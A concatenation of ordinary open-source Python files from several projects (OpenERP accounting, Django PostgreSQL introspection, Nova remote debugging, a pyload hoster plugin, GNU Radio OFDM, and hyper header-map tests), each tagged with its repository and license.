LIMIT 1) AS period_stop''', (fiscalyear_id, fiscalyear_id))
periods = [i[0] for i in cr.fetchall()]
if periods and len(periods) > 1:
start_period = periods[0]
end_period = periods[1]
res['value'] = {'period_from': start_period, 'period_to': end_period, 'date_from': False, 'date_to': False}
return res
def _get_account(self, cr, uid, context=None):
accounts = self.pool.get('account.account').search(cr, uid, [('parent_id', '=', False)], limit=1)
return accounts and accounts[0] or False
def _get_fiscalyear(self, cr, uid, context=None):
now = time.strftime('%Y-%m-%d')
fiscalyears = self.pool.get('account.fiscalyear').search(cr, uid, [('date_start', '<', now), ('date_stop', '>', now)], limit=1 )
return fiscalyears and fiscalyears[0] or False
def _get_all_journal(self, cr, uid, context=None):
return self.pool.get('account.journal').search(cr, uid ,[])
_defaults = {
'fiscalyear_id': _get_fiscalyear,
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.common.report',context=c),
'journal_ids': _get_all_journal,
'filter': 'filter_no',
'chart_account_id': _get_account,
'target_move': 'posted',
}
def _build_contexts(self, cr, uid, ids, data, context=None):
if context is None:
context = {}
result = {}
result['fiscalyear'] = 'fiscalyear_id' in data['form'] and data['form']['fiscalyear_id'] or False
result['journal_ids'] = 'journal_ids' in data['form'] and data['form']['journal_ids'] or False
result['chart_account_id'] = 'chart_account_id' in data['form'] and data['form']['chart_account_id'] or False
if data['form']['filter'] == 'filter_date':
result['date_from'] = data['form']['date_from']
result['date_to'] = data['form']['date_to']
elif data['form']['filter'] == 'filter_period':
if not data['form']['period_from'] or not data['form']['period_to']:
raise osv.except_osv(_('Error'),_('Select a starting and an ending period'))
result['period_from'] = data['form']['period_from']
result['period_to'] = data['form']['period_to']
return result
def _print_report(self, cr, uid, ids, data, context=None):
raise (_('Error'), _('not implemented'))
def check_report(self, cr, uid, ids, context=None):
if context is None:
context = {}
data = {}
data['ids'] = context.get('active_ids', [])
data['model'] = context.get('active_model', 'ir.ui.menu')
data['form'] = self.read(cr, uid, ids, ['date_from', 'date_to', 'fiscalyear_id', 'journal_ids', 'period_from', 'period_to', 'filter', 'chart_account_id', 'target_move'], context=context)[0]
for field in ['fiscalyear_id', 'chart_account_id', 'period_from', 'period_to']:
if isinstance(data['form'][field], tuple):
data['form'][field] = data['form'][field][0]
used_context = self._build_contexts(cr, uid, ids, data, context=context)
data['form']['periods'] = used_context.get('periods', False) and used_context['periods'] or []
data['form']['used_context'] = used_context
return self._print_report(cr, uid, ids, data, context=context)
account_common_report()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
SYSTRAN/geographic-api-python-client | systran_geographic_api/models/review.py | 1 | 1996 | #!/usr/bin/env python
# coding: utf-8
"""
Copyright 2015 SYSTRAN Software, Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Review(object):
"""
NOTE: This class is auto generated by the systran code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Systran model
:param dict systran_types: The key is attribute name and the value is attribute type.
:param dict attribute_map: The key is attribute name and the value is json key in definition.
"""
self.systran_types = {
'text': 'str',
'language': 'str',
'author': 'str',
'rating': 'int'
}
self.attribute_map = {
'text': 'text',
'language': 'language',
'author': 'author',
'rating': 'rating'
}
# Text
self.text = None # str
# Language
self.language = None # str
# Author
self.author = None # str
# Rating (from 1 to 5)
self.rating = None # int
def __repr__(self):
properties = []
for p in self.__dict__:
if p != 'systran_types' and p != 'attribute_map':
properties.append('{prop}={val!r}'.format(prop=p, val=self.__dict__[p]))
return '<{name} {props}>'.format(name=__name__, props=' '.join(properties))
| apache-2.0 |
2014c2g5/2014c2 | exts/w2/static/Brython2.0.0-20140209-164925/Lib/unittest/test/test_functiontestcase.py | 791 | 5478 | import unittest
from .support import LoggingResult
class Test_FunctionTestCase(unittest.TestCase):
# "Return the number of tests represented by the this test object. For
# TestCase instances, this will always be 1"
def test_countTestCases(self):
test = unittest.FunctionTestCase(lambda: None)
self.assertEqual(test.countTestCases(), 1)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
def test_run_call_order__error_in_setUp(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
raise RuntimeError('raised by setUp')
def test():
events.append('test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'addError', 'stopTest']
unittest.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
def test_run_call_order__error_in_test(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
raise RuntimeError('raised by test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest']
unittest.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
def test_run_call_order__failure_in_test(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
self.fail('raised by test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
unittest.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
def test_run_call_order__error_in_tearDown(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
def tearDown():
events.append('tearDown')
raise RuntimeError('raised by tearDown')
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
unittest.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
# will be a string (either 8-byte or unicode -- again, because the docs
# just say "string")
def test_id(self):
test = unittest.FunctionTestCase(lambda: None)
self.assertIsInstance(test.id(), str)
# "Returns a one-line description of the test, or None if no description
# has been provided. The default implementation of this method returns
# the first line of the test method's docstring, if available, or None."
def test_shortDescription__no_docstring(self):
test = unittest.FunctionTestCase(lambda: None)
self.assertEqual(test.shortDescription(), None)
# "Returns a one-line description of the test, or None if no description
# has been provided. The default implementation of this method returns
# the first line of the test method's docstring, if available, or None."
def test_shortDescription__singleline_docstring(self):
desc = "this tests foo"
test = unittest.FunctionTestCase(lambda: None, description=desc)
self.assertEqual(test.shortDescription(), "this tests foo")
| gpl-2.0 |
OndrejIT/pyload | module/plugins/accounts/RapiduNet.py | 8 | 1914 | # -*- coding: utf-8 -*-
import re
import time
from ..internal.Account import Account
from ..internal.misc import json
class RapiduNet(Account):
__name__ = "RapiduNet"
__type__ = "account"
__version__ = "0.12"
__status__ = "testing"
__description__ = """Rapidu.net account plugin"""
__license__ = "GPLv3"
__authors__ = [("prOq", None),
("Walter Purcaro", "vuolter@gmail.com")]
PREMIUM_PATTERN = r'>Account: <b>Premium'
VALID_UNTIL_PATTERN = r'>Account: <b>\w+ \((\d+)'
TRAFFIC_LEFT_PATTERN = r'class="tipsyS"><b>([\d.,]+)\s*([\w^_]*)<'
def grab_info(self, user, password, data):
validuntil = None
trafficleft = -1
premium = False
html = self.load("https://rapidu.net/")
if re.search(self.PREMIUM_PATTERN, html):
premium = True
m = re.search(self.VALID_UNTIL_PATTERN, html)
if m is not None:
validuntil = time.time() + (86400 * int(m.group(1)))
m = re.search(self.TRAFFIC_LEFT_PATTERN, html)
if m is not None:
trafficleft = self.parse_traffic(m.group(1), m.group(2))
return {'validuntil': validuntil,
'trafficleft': trafficleft, 'premium': premium}
def signin(self, user, password, data):
self.load("https://rapidu.net/ajax.php",
get={'a': "getChangeLang"},
post={'_go': "",
'lang': "en"})
html = self.load("https://rapidu.net/ajax.php",
get={'a': "getUserLogin"},
post={'_go': "",
'login': user,
'pass': password,
'remember': "1"})
json_data = json.loads(html)
self.log_debug(json_data)
if json_data['message'] != "success":
self.fail_login()
| gpl-3.0 |
megaumi/django | django/db/backends/postgresql/introspection.py | 326 | 10060 | from __future__ import unicode_literals
from collections import namedtuple
from django.db.backends.base.introspection import (
BaseDatabaseIntrospection, FieldInfo, TableInfo,
)
from django.utils.encoding import force_text
FieldInfo = namedtuple('FieldInfo', FieldInfo._fields + ('default',))
class DatabaseIntrospection(BaseDatabaseIntrospection):
# Maps type codes to Django Field types.
data_types_reverse = {
16: 'BooleanField',
17: 'BinaryField',
20: 'BigIntegerField',
21: 'SmallIntegerField',
23: 'IntegerField',
25: 'TextField',
700: 'FloatField',
701: 'FloatField',
869: 'GenericIPAddressField',
1042: 'CharField', # blank-padded
1043: 'CharField',
1082: 'DateField',
1083: 'TimeField',
1114: 'DateTimeField',
1184: 'DateTimeField',
1266: 'TimeField',
1700: 'DecimalField',
}
ignored_tables = []
_get_indexes_query = """
SELECT attr.attname, idx.indkey, idx.indisunique, idx.indisprimary
FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
pg_catalog.pg_index idx, pg_catalog.pg_attribute attr
WHERE c.oid = idx.indrelid
AND idx.indexrelid = c2.oid
AND attr.attrelid = c.oid
AND attr.attnum = idx.indkey[0]
AND c.relname = %s"""
def get_field_type(self, data_type, description):
field_type = super(DatabaseIntrospection, self).get_field_type(data_type, description)
if field_type == 'IntegerField' and description.default and 'nextval' in description.default:
return 'AutoField'
return field_type
def get_table_list(self, cursor):
"""
Returns a list of table and view names in the current database.
"""
cursor.execute("""
SELECT c.relname, c.relkind
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('r', 'v')
AND n.nspname NOT IN ('pg_catalog', 'pg_toast')
AND pg_catalog.pg_table_is_visible(c.oid)""")
return [TableInfo(row[0], {'r': 't', 'v': 'v'}.get(row[1]))
for row in cursor.fetchall()
if row[0] not in self.ignored_tables]
def get_table_description(self, cursor, table_name):
"Returns a description of the table, with the DB-API cursor.description interface."
# As cursor.description does not return reliably the nullable property,
# we have to query the information_schema (#7783)
cursor.execute("""
SELECT column_name, is_nullable, column_default
FROM information_schema.columns
WHERE table_name = %s""", [table_name])
field_map = {line[0]: line[1:] for line in cursor.fetchall()}
cursor.execute("SELECT * FROM %s LIMIT 1" % self.connection.ops.quote_name(table_name))
return [FieldInfo(*((force_text(line[0]),) + line[1:6]
+ (field_map[force_text(line[0])][0] == 'YES', field_map[force_text(line[0])][1])))
for line in cursor.description]
def get_relations(self, cursor, table_name):
"""
Returns a dictionary of {field_name: (field_name_other_table, other_table)}
representing all relationships to the given table.
"""
cursor.execute("""
SELECT c2.relname, a1.attname, a2.attname
FROM pg_constraint con
LEFT JOIN pg_class c1 ON con.conrelid = c1.oid
LEFT JOIN pg_class c2 ON con.confrelid = c2.oid
LEFT JOIN pg_attribute a1 ON c1.oid = a1.attrelid AND a1.attnum = con.conkey[1]
LEFT JOIN pg_attribute a2 ON c2.oid = a2.attrelid AND a2.attnum = con.confkey[1]
WHERE c1.relname = %s
AND con.contype = 'f'""", [table_name])
relations = {}
for row in cursor.fetchall():
relations[row[1]] = (row[2], row[0])
return relations
def get_key_columns(self, cursor, table_name):
key_columns = []
cursor.execute("""
SELECT kcu.column_name, ccu.table_name AS referenced_table, ccu.column_name AS referenced_column
FROM information_schema.constraint_column_usage ccu
LEFT JOIN information_schema.key_column_usage kcu
ON ccu.constraint_catalog = kcu.constraint_catalog
AND ccu.constraint_schema = kcu.constraint_schema
AND ccu.constraint_name = kcu.constraint_name
LEFT JOIN information_schema.table_constraints tc
ON ccu.constraint_catalog = tc.constraint_catalog
AND ccu.constraint_schema = tc.constraint_schema
AND ccu.constraint_name = tc.constraint_name
WHERE kcu.table_name = %s AND tc.constraint_type = 'FOREIGN KEY'""", [table_name])
key_columns.extend(cursor.fetchall())
return key_columns
def get_indexes(self, cursor, table_name):
# This query retrieves each index on the given table, including the
# first associated field name
cursor.execute(self._get_indexes_query, [table_name])
indexes = {}
for row in cursor.fetchall():
# row[1] (idx.indkey) is stored in the DB as an array. It comes out as
# a string of space-separated integers. This designates the field
# indexes (1-based) of the fields that have indexes on the table.
# Here, we skip any indexes across multiple fields.
if ' ' in row[1]:
continue
if row[0] not in indexes:
indexes[row[0]] = {'primary_key': False, 'unique': False}
# It's possible to have the unique and PK constraints in separate indexes.
if row[3]:
indexes[row[0]]['primary_key'] = True
if row[2]:
indexes[row[0]]['unique'] = True
return indexes
def get_constraints(self, cursor, table_name):
"""
Retrieves any constraints or keys (unique, pk, fk, check, index) across one or more columns.
"""
constraints = {}
# Loop over the key table, collecting things as constraints
# This will get PKs, FKs, and uniques, but not CHECK
cursor.execute("""
SELECT
kc.constraint_name,
kc.column_name,
c.constraint_type,
array(SELECT table_name::text || '.' || column_name::text
FROM information_schema.constraint_column_usage
WHERE constraint_name = kc.constraint_name)
FROM information_schema.key_column_usage AS kc
JOIN information_schema.table_constraints AS c ON
kc.table_schema = c.table_schema AND
kc.table_name = c.table_name AND
kc.constraint_name = c.constraint_name
WHERE
kc.table_schema = %s AND
kc.table_name = %s
ORDER BY kc.ordinal_position ASC
""", ["public", table_name])
for constraint, column, kind, used_cols in cursor.fetchall():
# If we're the first column, make the record
if constraint not in constraints:
constraints[constraint] = {
"columns": [],
"primary_key": kind.lower() == "primary key",
"unique": kind.lower() in ["primary key", "unique"],
"foreign_key": tuple(used_cols[0].split(".", 1)) if kind.lower() == "foreign key" else None,
"check": False,
"index": False,
}
# Record the details
constraints[constraint]['columns'].append(column)
# Now get CHECK constraint columns
cursor.execute("""
SELECT kc.constraint_name, kc.column_name
FROM information_schema.constraint_column_usage AS kc
JOIN information_schema.table_constraints AS c ON
kc.table_schema = c.table_schema AND
kc.table_name = c.table_name AND
kc.constraint_name = c.constraint_name
WHERE
c.constraint_type = 'CHECK' AND
kc.table_schema = %s AND
kc.table_name = %s
""", ["public", table_name])
for constraint, column in cursor.fetchall():
# If we're the first column, make the record
if constraint not in constraints:
constraints[constraint] = {
"columns": [],
"primary_key": False,
"unique": False,
"foreign_key": None,
"check": True,
"index": False,
}
# Record the details
constraints[constraint]['columns'].append(column)
# Now get indexes
cursor.execute("""
SELECT
c2.relname,
ARRAY(
SELECT (SELECT attname FROM pg_catalog.pg_attribute WHERE attnum = i AND attrelid = c.oid)
FROM unnest(idx.indkey) i
),
idx.indisunique,
idx.indisprimary
FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
pg_catalog.pg_index idx
WHERE c.oid = idx.indrelid
AND idx.indexrelid = c2.oid
AND c.relname = %s
""", [table_name])
for index, columns, unique, primary in cursor.fetchall():
if index not in constraints:
constraints[index] = {
"columns": list(columns),
"primary_key": primary,
"unique": unique,
"foreign_key": None,
"check": False,
"index": True,
}
return constraints
| bsd-3-clause |
pch957/python-bts-v0.9 | bts/misc.py | 1 | 1309 | # -*- coding: utf-8 -*-
import re
def _to_fixed_point(match):
"""Return the fixed point form of the matched number.
Parameters:
match is a MatchObject that matches exp_regex or similar.
If you wish to make match using your own regex, keep the following in mind:
group 1 should be the coefficient
group 3 should be the sign
group 4 should be the exponent
"""
sign = -1 if match.group(3) == "-" else 1
coefficient = float(match.group(1))
exponent = sign * float(match.group(4))
if exponent <= 0:
format_str = "%." + "%d" % (-exponent + len(match.group(1)) - 2) + "f"
else:
format_str = "%.1f"
return format_str % (coefficient * 10 ** exponent)
def to_fixed_point(string):
exp_regex = re.compile(r"(\d+(\.\d+)?)[Ee](\+|-)(\d+)")
return exp_regex.sub(_to_fixed_point, str(string))
def trim_float_precision(number, precision):
format_str = "%." + "%d" % (len(str(int(precision))) - 1) + "f"
return format_str % number
def get_median(prices):
lenth = len(prices)
if lenth == 0:
return None
_index = int(lenth / 2)
if lenth % 2 == 0:
median_price = float((prices[_index - 1] + prices[_index])) / 2
else:
median_price = prices[_index]
return median_price
| mit |
SujaySKumar/django | django/db/models/__init__.py | 239 | 1679 | from functools import wraps
from django.core.exceptions import ObjectDoesNotExist # NOQA
from django.db.models import signals # NOQA
from django.db.models.aggregates import * # NOQA
from django.db.models.deletion import ( # NOQA
CASCADE, DO_NOTHING, PROTECT, SET, SET_DEFAULT, SET_NULL, ProtectedError,
)
from django.db.models.expressions import ( # NOQA
F, Case, Expression, ExpressionWrapper, Func, Value, When,
)
from django.db.models.fields import * # NOQA
from django.db.models.fields.files import FileField, ImageField # NOQA
from django.db.models.fields.proxy import OrderWrt # NOQA
from django.db.models.fields.subclassing import SubfieldBase # NOQA
from django.db.models.lookups import Lookup, Transform # NOQA
from django.db.models.manager import Manager # NOQA
from django.db.models.query import Q, Prefetch, QuerySet # NOQA
# Imports that would create circular imports if sorted
from django.db.models.base import Model # NOQA isort:skip
from django.db.models.fields.related import ( # NOQA isort:skip
ForeignKey, ForeignObject, OneToOneField, ManyToManyField,
ManyToOneRel, ManyToManyRel, OneToOneRel,
)
def permalink(func):
"""
Decorator that calls urlresolvers.reverse() to return a URL using
parameters returned by the decorated function "func".
"func" should be a function that returns a tuple in one of the
following formats:
(viewname, viewargs)
(viewname, viewargs, viewkwargs)
"""
from django.core.urlresolvers import reverse
@wraps(func)
def inner(*args, **kwargs):
bits = func(*args, **kwargs)
return reverse(bits[0], None, *bits[1:3])
return inner
| bsd-3-clause |
JianyuWang/nova | nova/debugger.py | 28 | 3067 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# NOTE(markmc): this is imported before monkey patching in nova.cmd
# so we avoid extra imports here
import sys
def enabled():
return ('--remote_debug-host' in sys.argv and
'--remote_debug-port' in sys.argv)
def register_cli_opts():
from oslo_config import cfg
cli_opts = [
cfg.StrOpt('host',
help='Debug host (IP or name) to connect. Note '
'that using the remote debug option changes how '
'Nova uses the eventlet library to support async IO. '
'This could result in failures that do not occur '
'under normal operation. Use at your own risk.'),
cfg.IntOpt('port',
min=1,
max=65535,
help='Debug port to connect. Note '
'that using the remote debug option changes how '
'Nova uses the eventlet library to support async IO. '
'This could result in failures that do not occur '
'under normal operation. Use at your own risk.')
]
cfg.CONF.register_cli_opts(cli_opts, 'remote_debug')
def init():
from oslo_config import cfg
CONF = cfg.CONF
# NOTE(markmc): gracefully handle the CLI options not being registered
if 'remote_debug' not in CONF:
return
if not (CONF.remote_debug.host and CONF.remote_debug.port):
return
import logging
from nova.i18n import _LW
LOG = logging.getLogger(__name__)
LOG.debug('Listening on %(host)s:%(port)s for debug connection',
{'host': CONF.remote_debug.host,
'port': CONF.remote_debug.port})
try:
from pydev import pydevd
except ImportError:
import pydevd
pydevd.settrace(host=CONF.remote_debug.host,
port=CONF.remote_debug.port,
stdoutToServer=False,
stderrToServer=False)
LOG.warning(_LW('WARNING: Using the remote debug option changes how '
'Nova uses the eventlet library to support async IO. This '
'could result in failures that do not occur under normal '
'operation. Use at your own risk.'))
| apache-2.0 |
jasimpson/gnuradio-jasimpson | gnuradio-examples/python/ofdm/benchmark_ofdm_tx.py | 10 | 7987 | #!/usr/bin/env python
#
# Copyright 2005, 2006 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, blks2
from gnuradio import usrp
from gnuradio import eng_notation
from gnuradio.eng_option import eng_option
from optparse import OptionParser
import time, struct, sys
# from current dir
from transmit_path import transmit_path
from pick_bitrate import pick_tx_bitrate
import fusb_options
class my_top_block(gr.top_block):
def __init__(self, options):
gr.top_block.__init__(self)
self._tx_freq = options.tx_freq # tranmitter's center frequency
self._tx_subdev_spec = options.tx_subdev_spec # daughterboard to use
self._interp = options.interp # interpolating rate for the USRP (prelim)
self._fusb_block_size = options.fusb_block_size # usb info for USRP
self._fusb_nblocks = options.fusb_nblocks # usb info for USRP
if self._tx_freq is None:
sys.stderr.write("-f FREQ or --freq FREQ or --tx-freq FREQ must be specified\n")
raise SystemExit
# Set up USRP sink; also adjusts interp, and bitrate
self._setup_usrp_sink()
# copy the final answers back into options for use by modulator
#options.bitrate = self._bitrate
self.txpath = transmit_path(options)
self.connect(self.txpath, self.u)
def _setup_usrp_sink(self):
"""
Creates a USRP sink, determines the settings for best bitrate,
and attaches to the transmitter's subdevice.
"""
self.u = usrp.sink_c(fusb_block_size=self._fusb_block_size,
fusb_nblocks=self._fusb_nblocks)
self.u.set_interp_rate(self._interp)
# determine the daughterboard subdevice we're using
if self._tx_subdev_spec is None:
self._tx_subdev_spec = usrp.pick_tx_subdevice(self.u)
self.u.set_mux(usrp.determine_tx_mux_value(self.u, self._tx_subdev_spec))
self.subdev = usrp.selected_subdev(self.u, self._tx_subdev_spec)
# Set center frequency of USRP
ok = self.set_freq(self._tx_freq)
if not ok:
print "Failed to set Tx frequency to %s" % (eng_notation.num_to_str(self._tx_freq),)
raise ValueError
# Set the USRP for maximum transmit gain
# (Note that on the RFX cards this is a nop.)
self.set_gain(self.subdev.gain_range()[1])
# enable Auto Transmit/Receive switching
self.set_auto_tr(True)
def set_freq(self, target_freq):
"""
Set the center frequency we're interested in.
@param target_freq: frequency in Hz
@rypte: bool
Tuning is a two step process. First we ask the front-end to
tune as close to the desired frequency as it can. Then we use
the result of that operation and our target_frequency to
determine the value for the digital up converter.
"""
r = self.u.tune(self.subdev.which(), self.subdev, target_freq)
if r:
return True
return False
def set_gain(self, gain):
"""
Sets the analog gain in the USRP
"""
self.gain = gain
self.subdev.set_gain(gain)
def set_auto_tr(self, enable):
"""
Turns on auto transmit/receive of USRP daughterboard (if exits; else ignored)
"""
return self.subdev.set_auto_tr(enable)
def interp(self):
return self._interp
def add_options(normal, expert):
"""
Adds usrp-specific options to the Options Parser
"""
add_freq_option(normal)
normal.add_option("-T", "--tx-subdev-spec", type="subdev", default=None,
help="select USRP Tx side A or B")
normal.add_option("-v", "--verbose", action="store_true", default=False)
expert.add_option("", "--tx-freq", type="eng_float", default=None,
help="set transmit frequency to FREQ [default=%default]", metavar="FREQ")
expert.add_option("-i", "--interp", type="intx", default=256,
help="set fpga interpolation rate to INTERP [default=%default]")
# Make a static method to call before instantiation
add_options = staticmethod(add_options)
def _print_verbage(self):
"""
Prints information about the transmit path
"""
print "Using TX d'board %s" % (self.subdev.side_and_name(),)
print "modulation: %s" % (self._modulator_class.__name__)
print "interp: %3d" % (self._interp)
print "Tx Frequency: %s" % (eng_notation.num_to_str(self._tx_freq))
def add_freq_option(parser):
"""
Hackery that has the -f / --freq option set both tx_freq and rx_freq
"""
def freq_callback(option, opt_str, value, parser):
parser.values.rx_freq = value
parser.values.tx_freq = value
if not parser.has_option('--freq'):
parser.add_option('-f', '--freq', type="eng_float",
action="callback", callback=freq_callback,
help="set Tx and/or Rx frequency to FREQ [default=%default]",
metavar="FREQ")
# /////////////////////////////////////////////////////////////////////////////
# main
# /////////////////////////////////////////////////////////////////////////////
def main():
def send_pkt(payload='', eof=False):
return tb.txpath.send_pkt(payload, eof)
parser = OptionParser(option_class=eng_option, conflict_handler="resolve")
expert_grp = parser.add_option_group("Expert")
parser.add_option("-s", "--size", type="eng_float", default=400,
help="set packet size [default=%default]")
parser.add_option("-M", "--megabytes", type="eng_float", default=1.0,
help="set megabytes to transmit [default=%default]")
parser.add_option("","--discontinuous", action="store_true", default=False,
help="enable discontinuous mode")
my_top_block.add_options(parser, expert_grp)
transmit_path.add_options(parser, expert_grp)
blks2.ofdm_mod.add_options(parser, expert_grp)
blks2.ofdm_demod.add_options(parser, expert_grp)
fusb_options.add_options(expert_grp)
(options, args) = parser.parse_args ()
# build the graph
tb = my_top_block(options)
r = gr.enable_realtime_scheduling()
if r != gr.RT_OK:
print "Warning: failed to enable realtime scheduling"
tb.start() # start flow graph
# generate and send packets
nbytes = int(1e6 * options.megabytes)
n = 0
pktno = 0
pkt_size = int(options.size)
while n < nbytes:
send_pkt(struct.pack('!H', pktno) + (pkt_size - 2) * chr(pktno & 0xff))
n += pkt_size
sys.stderr.write('.')
if options.discontinuous and pktno % 5 == 1:
time.sleep(1)
pktno += 1
send_pkt(eof=True)
tb.wait() # wait for it to finish
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
| gpl-3.0 |
Lukasa/hyper | test/test_headers.py | 4 | 6779 | from __future__ import unicode_literals
from hyper.common.headers import HTTPHeaderMap
import pytest
class TestHTTPHeaderMap(object):
def test_header_map_can_insert_single_header(self):
h = HTTPHeaderMap()
h['key'] = 'value'
assert h['key'] == [b'value']
def test_header_map_insensitive_key(self):
h = HTTPHeaderMap()
h['KEY'] = 'value'
assert h['key'] == [b'value']
def test_header_map_is_iterable_in_order(self):
h = HTTPHeaderMap()
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
for k, v in items:
h[k] = v
for i, pair in enumerate(h):
assert items[i] == pair
def test_header_map_allows_multiple_values(self):
h = HTTPHeaderMap()
h['key'] = b'v1'
h[b'Key'] = b'v2'
assert h['key'] == [b'v1', b'v2']
def test_header_map_can_delete_value(self):
h = HTTPHeaderMap()
h['key'] = b'v1'
del h[b'key']
with pytest.raises(KeyError):
h[b'key']
def test_header_map_deletes_all_values(self):
h = HTTPHeaderMap()
h['key'] = 'v1'
h['key'] = 'v2'
del h['key']
with pytest.raises(KeyError):
h['key']
def test_setting_comma_separated_header(self):
h = HTTPHeaderMap()
h['key'] = 'v1, v2'
assert h[b'key'] == [b'v1', b'v2']
def test_containment(self):
h = HTTPHeaderMap()
h['key'] = 'val'
assert 'key' in h
assert b'key' in h
assert 'nonkey' not in h
def test_length_counts_lines_separately(self):
h = HTTPHeaderMap()
h['k1'] = 'v1, v2'
h['k2'] = 'v3'
h['k1'] = 'v4'
assert len(h) == 4
def test_keys(self):
h = HTTPHeaderMap()
h['k1'] = 'v1, v2'
h['k2'] = 'v3'
h['k1'] = 'v4'
assert len(list(h.keys())) == 4
assert list(h.keys()) == [b'k1', b'k1', b'k2', b'k1']
def test_values(self):
h = HTTPHeaderMap()
h['k1'] = 'v1, v2'
h['k2'] = 'v3'
h['k1'] = 'v4'
assert len(list(h.values())) == 4
assert list(h.values()) == [b'v1', b'v2', b'v3', b'v4']
def test_items(self):
h = HTTPHeaderMap()
items = [
(b'k1', b'v2'),
(b'k2', b'v2'),
(b'k2', b'v3'),
]
for k, v in items:
h[k] = v
for i, pair in enumerate(h.items()):
assert items[i] == pair
def test_empty_get(self):
h = HTTPHeaderMap()
assert h.get('nonexistent', 'hi there') == 'hi there'
def test_actual_get(self):
h = HTTPHeaderMap()
h['k1'] = 'v1, v2'
h['k2'] = 'v3'
h['k1'] = 'v4'
assert h.get('k1') == [b'v1', b'v2', b'v4']
def test_doesnt_split_set_cookie(self):
h = HTTPHeaderMap()
h['Set-Cookie'] = 'v1, v2'
assert h['set-cookie'] == [b'v1, v2']
assert h.get(b'set-cookie') == [b'v1, v2']
def test_equality(self):
h1 = HTTPHeaderMap()
h1['k1'] = 'v1, v2'
h1['k2'] = 'v3'
h1['k1'] = 'v4'
h2 = HTTPHeaderMap()
h2['k1'] = 'v1, v2'
h2['k2'] = 'v3'
h2['k1'] = 'v4'
assert h1 == h2
def test_inequality_of_raw_ordering(self):
h1 = HTTPHeaderMap()
h1['k1'] = 'v1, v2'
h1['k2'] = 'v3'
h1['k1'] = 'v4'
h2 = HTTPHeaderMap()
h2['k1'] = 'v1'
h2['k1'] = 'v2'
h2['k2'] = 'v3'
h2['k1'] = 'v4'
assert h1 != h2
def test_inequality(self):
h1 = HTTPHeaderMap()
h1['k1'] = 'v1, v2'
h1['k2'] = 'v3'
h1['k1'] = 'v4'
h2 = HTTPHeaderMap()
h2['k1'] = 'v1'
h2['k1'] = 'v4'
h2['k1'] = 'v2'
h2['k2'] = 'v3'
assert h1 != h2
def test_deleting_nonexistent(self):
h = HTTPHeaderMap()
with pytest.raises(KeyError):
del h['key']
def test_can_create_from_iterable(self):
items = [
(b'k1', b'v2'),
